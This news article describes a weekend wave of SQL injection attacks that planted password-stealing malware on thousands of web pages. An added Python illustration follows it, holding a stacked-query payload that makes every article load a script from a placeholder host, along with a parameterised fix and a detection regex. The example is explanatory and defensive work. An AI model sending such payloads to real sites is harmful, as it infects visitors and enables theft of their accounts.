
Websites that use Joomla,
an open source content management system, are vulnerable to the
latest round of
SQL injection attacks, says a security researcher.
Christoph Alme, a malware specialist at security firm
Secure Computing,
said, "There are more than five million Joomla pages out
there."
The latest attack, discovered over the weekend by Secure
Computing, used search engines to speed up the hunt for
vulnerable web pages. Into those pages the attackers inject SQL
statements that plant malicious content in the site's database, so
that visitors are then served malware which steals passwords to
bank, game and other accounts.
The criminals searched for ASP.NET pages that contained
vulnerable order forms and sign-on details. Joomla itself is
written in PHP and usually backed by MySQL, so that search pattern
targets a different stack; the underlying flaw, user input spliced
unescaped into a SQL statement, is the same on both. Once they
discovered an unprotected page, they used it to write content into
the underlying database; that content was then served to every
visitor of the site and recorded their personal details.
More than 14,000 web pages were infected in the weekend attack.
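The following Python script is an added illustration of the mechanism described above; it is not code from the article, from Joomla or from Secure Computing. On an in-memory SQLite table it shows how a single request whose page parameter is concatenated into a query can rewrite every stored article body so that the site serves an external script to all visitors, and how the parameterised version of the same lookup treats that input as plain data. The table, the article rows, the payload, the placeholder host example.invalid and the function names are all constructed for the example. The vulnerable path calls executescript() only to mimic a database layer that runs several semicolon-separated statements from one request, which is what this kind of attack depends on.

```python
import re
import sqlite3

# Constructed sample data: a tiny CMS table whose "body" column is rendered
# into every page the site serves to visitors. (Not a real Joomla schema.)
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)"
    )
    con.executemany(
        "INSERT INTO articles (title, body) VALUES (?, ?)",
        [("Welcome", "Hello visitor"), ("News", "Site updated today")],
    )
    con.commit()
    return con

# Constructed payload in the shape of a mass-injection request: close the
# intended statement, then append a remote script reference to every stored
# body. The host example.invalid is a placeholder, not a real attacker domain.
PAYLOAD = (
    "1; UPDATE articles SET body = body || "
    "'<script src=\"http://example.invalid/m.js\"></script>';"
)

def show_article_vulnerable(con, article_id):
    """Vulnerable: the request parameter is spliced into the SQL text.

    executescript() is used here only so the database layer behaves like one
    that runs several ';'-separated statements from a single request; the
    attack depends on that. Python's execute() would reject the second
    statement, which is a driver-level mitigation, not a fix for the code.
    """
    sql = f"SELECT title, body FROM articles WHERE id = {article_id}"
    con.executescript(sql)

def show_article_safe(con, article_id):
    """Hardened: reject anything that is not an integer id, then bind it as a
    parameter so the driver never parses it as SQL. Returns None on bad input."""
    try:
        article_id = int(article_id)
    except (TypeError, ValueError):
        return None
    return con.execute(
        "SELECT title, body FROM articles WHERE id = ?", (article_id,)
    ).fetchone()

# Post-incident check: which stored bodies now carry an external script tag?
SCRIPT_TAG = re.compile(r"<script\b[^>]*\bsrc=", re.IGNORECASE)

def find_injected(con):
    return [
        row_id
        for row_id, body in con.execute("SELECT id, body FROM articles ORDER BY id")
        if SCRIPT_TAG.search(body)
    ]

if __name__ == "__main__":
    con = make_db()
    show_article_vulnerable(con, PAYLOAD)
    print("articles rewritten by one request:", find_injected(con))  # [1, 2]
    con = make_db()
    print("safe lookup with the same input:", show_article_safe(con, PAYLOAD))  # None
    print("articles rewritten:", find_injected(con))  # []
```

find_injected() is the check an operator would run after an incident of this kind: a stored body that references an external script is a strong sign of injection, and the same query works against a real CMS table once the table and column names are substituted.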
"There has been a big rise in SQL injection attacks this year,"
Alme said. He said the current attack, which infected at least 20
popular UK sites, was dangerous because it was aimed at sites that
people were likely to visit regularly.
"Government sites are as vulnerable as commercial sites," Alme
said. "The visitor may have visited the site last week without
problems. This week he trusts the site, but is hit by a drive-by
attack."
He said the criminals also hid malware in downloads of popular
software such as QuickTime and RealPlayer.